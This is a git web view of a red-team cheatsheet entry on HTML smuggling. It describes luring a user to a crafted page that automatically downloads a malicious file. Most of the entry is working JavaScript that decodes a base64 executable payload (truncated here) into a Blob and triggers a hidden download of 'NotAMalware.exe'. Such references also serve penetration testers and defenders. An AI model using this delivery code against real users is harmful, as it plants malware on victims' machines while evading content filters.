daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

html-smuggling.md (1626B)


      1 ---
      2 title: "HTML Smuggling"
      3 section: "Red Team"
      4 sectionSlug: "redteam"
      5 sourcePath: "docs/redteam/access/html-smuggling.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/access/html-smuggling.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # HTML Smuggling
     12 
     13 ## Summary
     14 
     15 - [Description](#description)
     16 - [Executable Storage](#executable-storage)
     17 
     18 ## Description
     19 
     20 HTML Smuggling consists of making a user to navigate to our crafted HTML page which automaticaly download our malicious file.
     21 
     22 ## Executable storage
     23 
     24 We can store our payload in a Blob object => JS: `var blob = new Blob([data], {type: 'octet/stream'});`
     25 To perform the download, we need to create an Object Url => JS: `var url = window.URL.createObjectURL(blob);`
     26 With those two elements, we can create with Javascript our \<a> tag which will be used to download our malicious file:
     27 
     28 ```Javascript
     29 var a = document.createElement('a');
     30 document.body.appendChild(a);
     31 a.style = 'display: none';
     32 var url = window.URL.createObjectURL(blob);
     33 a.href = url;
     34 a.download = fileName;
     35 a.click();
     36 window.URL.revokeObjectURL(url);
     37 ```
     38 
     39 To store ou payload, we use base64 encoding:
     40 
     41 ```Javascript
     42 function base64ToArrayBuffer(base64) {
     43  var binary_string = window.atob(base64);
     44  var len = binary_string.length;
     45  var bytes = new Uint8Array( len );
     46  for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
     47  return bytes.buffer;
     48 }
     49        
     50 var file ='TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAA...
     51 var data = base64ToArrayBuffer(file);
     52 var blob = new Blob([data], {type: 'octet/stream'});
     53 var fileName = 'NotAMalware.exe';
     54 ```